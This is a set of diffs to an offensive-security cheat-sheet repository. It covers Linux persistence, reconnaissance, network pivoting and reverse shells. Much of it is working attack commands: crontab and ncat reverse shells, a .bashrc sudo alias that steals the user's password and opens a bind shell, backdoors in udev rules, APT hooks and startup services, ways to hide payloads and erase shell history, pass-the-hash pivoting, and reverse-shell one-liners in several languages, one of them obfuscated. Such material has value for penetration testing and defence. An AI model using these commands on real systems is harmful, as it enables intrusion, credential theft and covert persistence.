 chown root:root $TMPDIR2/croissant
 chmod 4777 $TMPDIR2/croissant
 ```
 ## Crontab (Reverse shell to 192.168.1.2 on port 4242)
 ```bash
 (crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
 ```
 ## Backdooring an user's bash_rc (FR/EN Version)
 ```bash
 TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
 cat << EOF > /tmp/$TMPNAME2
  alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale  = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale  = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
 EOF
 if [ -f ~/.bashrc ]; then
    cat /tmp/$TMPNAME2 >> ~/.bashrc
 fi
 if [ -f ~/.zshrc ]; then
    cat /tmp/$TMPNAME2 >> ~/.zshrc
 fi
 rm /tmp/$TMPNAME2
 ```
 ## Backdooring a startup service
 ```bash
 RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
 sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
 ```
 ## Backdooring an user startup file
 Linux, write a file in  `~/.config/autostart/NOM_OF_FILE.desktop`
 ```powershell
 In : ~/.config/autostart/*.desktop
 [Desktop Entry]
 Type=Application
 Name=Welcome
 Exec=/var/lib/gnome-welcome-tour
 AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
 OnlyShowIn=GNOME;
 X-GNOME-Autostart-enabled=false
 ```
 ## Backdooring a driver
 ```bash
 echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
 ```
 ## Backdooring the APT
 If you can create a file on the apt.conf.d directory with: `APT::Update::Pre-Invoke {"CMD"};`
 Next time "apt-get update" is done, your CMD will be executed!
 ```bash
 echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
 ```
 ## Tips
 Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
 ```bash
 #[2J[2J[2J[2H[2A# Do not remove. Generated from /etc/issue.conf by configure.
 ```
 Clear the last line of the history.
 ```bash
 history -d $(history | tail -2 | awk '{print $1}') 2> /dev/null
 ```
 Clear history
 ```bash
 [SPACE] ANY COMMAND
 or
 export HISTSIZE=0
 export HISTFILESIZE=0
 unset HISTFILE; CTRL-D
 or
 kill -9 $$
 or
 echo "" > ~/.bash_history
 or
 rm ~/.bash_history -rf
 or
 history -c
 or
 ln /dev/null ~/.bash_history -sf
 ```
 The following directories are temporary and usually writeable
 ```bash
 /var/tmp/
 /tmp/
 /dev/shm/
 ```
 ## Thanks to
 * [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
 * [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)
 * [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html)
 * [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/)
 * [Pouki from JDI](#no_source_code)
--- a/Resources/Methodology_and_enumeration.md
+++ b/Resources/Methodology_and_enumeration.md
@@ -1,135 +1,54 @@
 # Bug Hunting Methodology and Enumeration
 ![exploitation](https://img.shields.io/badge/WIP-70%25-green.svg)
-**Summary**
+## Summary
 1. [Enumerate all subdomains](#enumerate-all-subdomains-only-if-the-scope-is-domainext)
 * Subbrute
 * KnockPy
 * GoogleDorks
 * EyeWitness
 * Sublist3r
 * Aquatone
 2. [Passive Recon](#passive-recon)
 * Shodan
 * Wayback Machine
 * The Harvester
 3. [Active Recon](#active-recon)
 * Nmap
 * Nmap Script
 * RPCClient
 * Enum4all
 4. [List all the subdirectories and files](#list-all-the-subdirectories-and-files)
 * Gobuster
 * Backup File Artifacts Checker
 5. [Web Vulnerabilities](#looking-for-web-vulnerabilities)
 * Repository Github
 * Burp
 * Web Checklist
 * Nikto
 * Payment functionality
 * [Passive Recon](#passive-recon)
  * Shodan
  * Wayback Machine
  * The Harvester
-## Enumerate all subdomains (only if the scope is *.domain.ext)
+* [Active Recon](#active-recon)
-
+  * Nmap
-* Using Subbrute
+  * Nmap Script
-```bash
+  * RPCClient
-git clone https://github.com/TheRook/subbrute
+  * Enum4all
 python subbrute.py domain.example.com
 ```
 * Using KnockPy with Daniel Miessler’s SecLists for subdomain "/Discover/DNS"
 ```bash
 git clone https://github.com/guelfoweb/knock
 git clone https://github.com/danielmiessler/SecLists.git
 knockpy domain.com -w subdomains-top1mil-110000.txt
 ```
 * Using Google Dorks and Google Transparency Report
 ```bash
 site:*.domain.com -www
 site:domain.com filetype:pdf
 site:domain.com inurl:'&'
 site:domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
 site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
 site:*.*.domain.com
 You need to include subdomains ;)
 https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true
 ```
 * Subdomain take over using HostileSubBruteForcer
 ```bash
 git clone https://github.com/nahamsec/HostileSubBruteforcer
 chmox +x sub_brute.rb
 ./sub_brute.rb
 ```
 * EyeWitness and Nmap scans from the KnockPy and enumall scans
 ```bash
 git clone https://github.com/ChrisTruncer/EyeWitness.git
 ./setup/setup.sh
 ./EyeWitness.py -f filename -t optionaltimeout --open (Optional)
 ./EyeWitness -f urls.txt --web
 ./EyeWitness -x urls.xml -t 8 --headless
 ./EyeWitness -f rdp.txt --rdp
 ```
 * Using Sublist3r
 ```bash
 To enumerate subdomains of specific domain and show the results in realtime:
 python sublist3r.py -v -d example.com
 To enumerate subdomains and enable the bruteforce module:
 python sublist3r.py -b -d example.com
 To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines
 python sublist3r.py -e google,yahoo,virustotal -d example.com
 python sublist3r.py -b -d example.com
 ```
 * Using Aquatone
 ```
 gem install aquatone
 Discover subdomains : results in ~/aquatone/example.com/hosts.txt
 aquatone-discover --domain example.com
 aquatone-discover --domain example.com --threads 25
 aquatone-discover --domain example.com --sleep 5 --jitter 30
 aquatone-discover --set-key shodan o1hyw8pv59vSVjrZU3Qaz6ZQqgM91ihQ
 Active scans : results in ~/aquatone/example.com/urls.txt
 aquatone-scan --domain example.com
 aquatone-scan --domain example.com --ports 80,443,3000,8080
 aquatone-scan --domain example.com --ports large
 aquatone-scan --domain example.com --threads 25
 Final results
 aquatone-gather --domain example.com
 ```
 * [List all the subdirectories and files](#list-all-the-subdirectories-and-files)
  * Gobuster
  * Backup File Artifacts Checker
 * [Web Vulnerabilities](#looking-for-web-vulnerabilities)
  * Repository Github
  * Burp
  * Web Checklist
  * Nikto
  * Payment functionality
 ## Passive recon
 * Using Shodan (https://www.shodan.io/) to detect similar app
-  ```
+
  ```bash
  can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse)
  nmap --script shodan-hq.nse --script-args 'apikey=<yourShodanAPIKey>,target=<hackme>'
  ```
-* Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints,
+* Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints
-  ```
+
  ```bash
  look for JS files, old links
  ```
 * Using The Harvester (https://github.com/laramies/theHarvester)
-  ```
+
  ```python
  python theHarvester.py -b all -d domain.com
  ```
 ## Active recon
 * Basic NMAP
  ```bash
  sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
  sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
@@ -143,6 +62,7 @@ aquatone-gather --domain example.com
 * CTF NMAP
  This configuration is enough to do a basic check for a CTF VM
  ```bash
  nmap -sV -sC -oA ~/nmap-initial 192.168.1.1
@@ -153,8 +73,8 @@ aquatone-gather --domain example.com
  After this quick command you can add "-p-" to run a full scan while you work with the previous result
  ```
 * Aggressive NMAP
  ```bash
  nmap -A -T4 scanme.nmap.org
  • -A: Enable OS detection, version detection, script scanning, and traceroute
@@ -162,17 +82,20 @@ aquatone-gather --domain example.com
  ```
 * NMAP and add-ons
-  1. Using searchsploit to detect vulnerable services
+  * Using searchsploit to detect vulnerable services
-  ```bash
+  
-  nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml
+    ```bash
-  ```
+    nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml
-  2. Generating nice scan report
+    ```
  ```bash
  nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
  ```
  * Generating nice scan report
    ```bash
    nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
    ```
 * NMAP Scripts
  ```bash
  nmap -sC : equivalent to --script=default
@@ -202,21 +125,24 @@ aquatone-gather --domain example.com
  ```
 * RPCClient
  ```bash
  ╰─$ rpcclient -U "" [target host]
  rpcclient $> querydominfo
-  Domain:		WORKGROUP
+  Domain: WORKGROUP
-  Server:		METASPLOITABLE
+  Server: METASPLOITABLE
-  Comment:	metasploitable server (Samba 3.0.20-Debian)
+  Comment: metasploitable server (Samba 3.0.20-Debian)
-  Total Users:	35
+  Total Users: 35
  rpcclient $> enumdomusers
  user:[games] rid:[0x3f2]
  user:[nobody] rid:[0x1f5]
  user:[bind] rid:[0x4ba]
  ```
 * Enum4all
-  ```
+
  ```bash
  Usage: ./enum4linux.pl [options]ip
  -U        get userlist
  -M        get machine list*
@@ -232,102 +158,89 @@ aquatone-gather --domain example.com
  ==============================
  |   Users on XXX.XXX.XXX.XXX |
  ==============================
-  index: 0x1 Account: games	Name: games	Desc: (null)
+  index: 0x1 Account: games Name: games Desc: (null)
-  index: 0x2 Account: nobody	Name: nobody	Desc: (null)
+  index: 0x2 Account: nobody Name: nobody Desc: (null)
-  index: 0x3 Account: bind	Name: (null)	Desc: (null)
+  index: 0x3 Account: bind Name: (null) Desc: (null)
-  index: 0x4 Account: proxy	Name: proxy	Desc: (null)
+  index: 0x4 Account: proxy Name: proxy Desc: (null)
-  index: 0x5 Account: syslog	Name: (null)	Desc: (null)
+  index: 0x5 Account: syslog Name: (null) Desc: (null)
-  index: 0x6 Account: user	Name: just a user,111,,	Desc: (null)
+  index: 0x6 Account: user Name: just a user,111,, Desc: (null)
-  index: 0x7 Account: www-data	Name: www-data	Desc: (null)
+  index: 0x7 Account: www-data Name: www-data Desc: (null)
-  index: 0x8 Account: root	Name: root	Desc: (null)
+  index: 0x8 Account: root Name: root Desc: (null)
  ```  
 ## List all the subdirectories and files
 * Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.
 ```bash
 git clone https://github.com/mazen160/bfac
-Check a single URL
+  ```bash
-bfac --url http://example.com/test.php --level 4
+  git clone https://github.com/mazen160/bfac
-Check a list of URLs
+  Check a single URL
-bfac --list testing_list.txt
+  bfac --url http://example.com/test.php --level 4
-```
+
  Check a list of URLs
  bfac --list testing_list.txt
  ```
 * Using DirBuster or GoBuster
 ```bash
 ./gobuster -u http://buffered.io/ -w words.txt -t 10
 -u url
 -w wordlist
 -t threads
-More subdomain :
+  ```bash
-./gobuster -m dns -w subdomains.txt -u google.com -i
+  ./gobuster -u http://buffered.io/ -w words.txt -t 10
  -u url
  -w wordlist
  -t threads
-gobuster -w wordlist -u URL -r -e
+  More subdomain :
-```
+  ./gobuster -m dns -w subdomains.txt -u google.com -i
  gobuster -w wordlist -u URL -r -e
  ```
 * Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
-```bash
+
-#!/bin/bash
+  ```bash
-for ipa in 98.13{6..9}.{0..255}.{0..255}; do
+  #!/bin/bash
-wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
+  for ipa in 98.13{6..9}.{0..255}.{0..255}; do
-```
+  wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
  ```
 * Using a script to detect all .htpasswd files in a range of IPs
-```bash
+
-#!/bin/bash
+  ```bash
-for ipa in 98.13{6..9}.{0..255}.{0..255}; do
+  #!/bin/bash
-wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
+  for ipa in 98.13{6..9}.{0..255}.{0..255}; do
-```
+  wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
  ```
 ## Looking for Web vulnerabilities
 * Look for private information in GitHub repos with GitRob
-```
+
-git clone https://github.com/michenriksen/gitrob.git
+  ```bash
-gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
+  git clone https://github.com/michenriksen/gitrob.git
-```
+  gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
  ```
 * Explore the website with a proxy (ZAP/Burp Suite)
- 1. Start proxy, visit the main target site and perform a Forced Browse to discover files and directories
+  1. Start proxy, visit the main target site and perform a Forced Browse to discover files and directories
- 2. Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
+  2. Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
- 3. Explore and understand available functionality, noting areas that correspond to vulnerability types
+  3. Explore and understand available functionality, noting areas that correspond to vulnerability types
 ```bash
 Burp Proxy configuration on port 8080 (in .bashrc):
 alias set_proxy_burp='gsettings set org.gnome.system.proxy.http host "http://localhost";gsettings set org.gnome.system.proxy.http port 8080;gsettings set org.gnome.system.proxy mode "manual"'
 alias set_proxy_normal='gsettings set org.gnome.system.proxy mode "none"'
-then launch Burp with : java -jar burpsuite_free_v*.jar &
+    ```bash
-```
+    Burp Proxy configuration on port 8080 (in .bashrc):
    alias set_proxy_burp='gsettings set org.gnome.system.proxy.http host "http://localhost";gsettings set org.gnome.system.proxy.http port 8080;gsettings set org.gnome.system.proxy mode "manual"'
    alias set_proxy_normal='gsettings set org.gnome.system.proxy mode "none"'
-* Checklist for Web vulns
+    then launch Burp with : java -jar burpsuite_free_v*.jar &
-  ```
+    ```
-  [] AWS Amazon Bucket S3  
+
-  [] Git Svn insecure files   
+* [Checklist for Web vulns](http://mdsec.net/wahh/tasks.html)
  [] CVE Shellshock Heartbleed  
  [] Open redirect            
  [] Traversal directory    
  [] XSS injection
  [] CRLF injection  
  [] CSRF injection          
  [] SQL injection            
  [] NoSQL injection                 
  [] PHP include      
  [] Upload insecure files     
  [] SSRF injection         
  [] XXE injections
  [] CSV injection
  [] PHP serialization
  ...   
  ```
 * Subscribe to the site and pay for the additional functionality to test
 * Launch a Nikto scan in case you missed something
-  ```
+
  ```powershell
  nikto -h http://domain.example.com
  ```
@@ -355,7 +268,7 @@ International test card numbers and tokens
 | 4000002460000001 | tok_fi         | Finland (FI)   | Visa           |
 | 4000002500000003 | tok_fr         | France (FR)    | Visa           |
 ## Thanks to
- * http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
+
- * [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)
+* [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/)
 * [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)
--- a/Resources/Network
+++ b/Resources/Network
@@ -0,0 +1,138 @@
 # Network Discovery
 ## Netdiscover
 ```powershell
 netdiscover -i eth0 -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 20 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 876
 _____________________________________________________________________________
 IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.AA    68:AA:AA:AA:AA:AA     15     630  Sagemcom
 192.168.1.XX    52:XX:XX:XX:XX:XX      1      60  Unknown vendor
 192.168.1.YY    24:YY:YY:YY:YY:YY      1      60  QNAP Systems, Inc.
 192.168.1.ZZ    b8:ZZ:ZZ:ZZ:ZZ:ZZ      3     126  HUAWEI TECHNOLOGIES CO.,LTD  
 ```
 ## Responder
 ```powershell
 responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
 responder.py -I eth0 -wrf
 ```
 Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
 ## Bettercap
 ```powershell
 bettercap -X --proxy --proxy-https -T <target IP>
 # better cap in spoofing, discovery, sniffer
 # intercepting http and https requests,
 # targetting specific IP only
 ```
 ## Nmap
 * Ping sweep (No port scan, No DNS resolution)
 ```powershell
 nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
 ```
 * Basic NMAP
 ```bash
 sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
 sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
 • the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
 • the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
 • 192.168.0.1 is the IP address to scan
 • -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
 • -iL INPUTFILE tells Nmap to use the provided file as inputs
 ```
 * CTF NMAP
 This configuration is enough to do a basic check for a CTF VM
 ```bash
 nmap -sV -sC -oA ~/nmap-initial 192.168.1.1
 -sV : Probe open ports to determine service/version info
 -sC : to enable the script
 -oA : to save the results
 After this quick command you can add "-p-" to run a full scan while you work with the previous result
 ```
 * Aggressive NMAP
 ```bash
 nmap -A -T4 scanme.nmap.org
 • -A: Enable OS detection, version detection, script scanning, and traceroute
 • -T4: Defines the timing for the task (options are 0-5 and higher is faster)
 ```
 * Using searchsploit to detect vulnerable services
 ```bash
 nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml
 ```
 * Generating nice scan report
 ```bash
 nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
 ```
 * NMAP Scripts
 ```bash
 nmap -sC : equivalent to --script=default
 nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap
 PORT   STATE SERVICE
 80/tcp open  http
 | http-enum:
 |   /phpmyadmin/: phpMyAdmin
 |   /.git/HEAD: Git folder
 |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
 |_  /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
 nmap --script smb-enum-users.nse -p 445 [target host]
 Host script results:
 | smb-enum-users:
 |   METASPLOITABLE\backup (RID: 1068)
 |     Full name:   backup
 |     Flags:       Account disabled, Normal user account
 |   METASPLOITABLE\bin (RID: 1004)
 |     Full name:   bin
 |     Flags:       Account disabled, Normal user account
 |   METASPLOITABLE\msfadmin (RID: 3000)
 |     Full name:   msfadmin,,,
 |     Flags:       Normal user account
 List Nmap scripts : ls /usr/share/nmap/scripts/
 ```
 ## Reconnoitre
 Dependencies:
 * nbtscan
 * nmap
 ```powershell
 python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostnames --services --quick
 ```
 If you have a segfault with nbtscan, read the following quote.
 > Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
 ## Thanks
 * [TODO](TODO)
--- a/Resources/Network
+++ b/Resources/Network
@@ -1,20 +1,22 @@
 # Network Pivoting Techniques
 ## Windows netsh Port Forwarding
 ```powershell
 netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
 netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
 ```
 1. listenaddress – is a local IP address waiting for a connection.
 2. listenport – local listening TCP port (the connection is waited on it).
 3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
 4. connectport – is a TCP port to which the connection from listenport is forwarded to.
 ## SSH
 ### SOCKS Proxy
 ```bash
 ssh -D8080 [user]@[host]
@@ -23,65 +25,91 @@ ssh -N -f -D 9000 [user]@[host]
 -N : do not execute a remote command
 ```
 Cool Tip : Konami SSH Port forwarding
 ```bash
 [ENTER] + [~C]
 -D 1090
 ```
 ### Local Port Forwarding
 ```bash
 ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
 ```
 ### Remote Port Forwarding
 ```bash
 ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
 ```
 ## Proxychains
 **Config file**: /etc/proxychains.conf
 ```bash
 [ProxyList]
 socks4 localhost 8080
 ```
-Set the SOCKS4 proxy then `proxychains nmap 192.168.5.6`
+
 Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
 ## Web SOCKS - reGeorg
-```
+
 [reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
 ```python
 python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
 ```
 ## Rpivot
 Server (Attacker box)
 ```python
 python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
 ```
 Client (Compromised box)
 ```python
 python client.py --server-ip <ip> --server-port 9443
 ```
 Through corporate proxy
 ```python
 python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
 --ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
 ```
 Passing the hash
 ```python
 python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
 --ntlm-proxy-port 8080 --domain CORP --username jdoe \
 --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
 ```
 ## plink
 ```powershell
 plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389    --> exposes the RDP port of the machine in the port 3390 of the SSH Server
 plink -l root -pw mypassword 192.168.18.84 -R
 plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
 ```
 ## Basic Pivoting Types
 | Type              | Use Case                                    |
 | :-------------    | :------------------------------------------ |
 | Listen - Listen   | Exposed asset, may not want to connect out. |
 | Listen - Connect  | Normal redirect.                            |
 | Connect - Connect | Can’t bind, so connect to bridge two hosts  |
 ## Listen - Listen
 | Type              | Use Case                                    |
 | :-------------    | :------------------------------------------ |
 | ncat              | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`|
@@ -89,8 +117,8 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
 | remote host 1     | `ncat localhost 8080 < file`                |
 | remote host 2     | `ncat localhost 9090 > newfile`             |
 ## Listen - Connect
 | Type              | Use Case                                                        |
 | :-------------    | :------------------------------------------                     |
 | ncat              | `ncat -l -v -p 8080 -c "ncat localhost 9090"`                   |
@@ -98,8 +126,8 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
 | remote host 1     | `ncat localhost -p 8080 < file`                                 |
 | remote host 2     | `ncat -l -p 9090 > newfile`                                     |
 ## Connect - Connect
 | Type              | Use Case                                                                   |
 | :-------------    | :------------------------------------------                                |
 | ncat              | `ncat localhost 8080 -c "ncat localhost 9090"`                             |
@@ -107,7 +135,9 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
 | remote host 1     | `ncat -l -p 8080 < file                                                    |
 | remote host 2     | `ncat -l -p 9090 > newfile`                                                |
 ## Thanks to
- * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
+
- * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
+* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
 * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
 * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
 * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
--- a/Resources/Reverse
+++ b/Resources/Reverse
@@ -2,15 +2,17 @@
 ## Reverse Shell Cheat Sheet
-Bash TCP
+### Bash TCP
 ```bash
 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
 ```
-Bash UDP
+### Bash UDP
-```
+
 ```bash
 Victim:
 sh -i >& /dev/udp/127.0.0.1/4242 0>&1
@@ -18,8 +20,8 @@ Listener:
 nc -u -lvp 4242
 ```
 ### Perl
 Perl
 ```perl
 perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
@@ -30,17 +32,32 @@ NOTE: Windows only
 perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
 ```
-Python
+### Python
 Linux only
 ```python
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
 ```
 ```python
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 ```
-PHP
+Windows only
 ```powershell
 C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
 ```
 ### PHP
 ```bash
 php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```
-Ruby
+### Ruby
 ```ruby
 ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
@@ -50,24 +67,27 @@ NOTE: Windows only
 ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 ```
 ### Netcat Traditional
 Netcat Traditional
 ```bash
 nc -e /bin/sh [IPADDR] [PORT]
 ```
-Netcat OpenBsd
+### Netcat OpenBsd
 ```bash
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
 ```
-Ncat
+### Ncat
 ```bash
 ncat 127.0.0.1 4444 -e /bin/bash
 ncat --udp 127.0.0.1 4444 -e /bin/bash
 ```
-Powershell
+### Powershell
 ```powershell
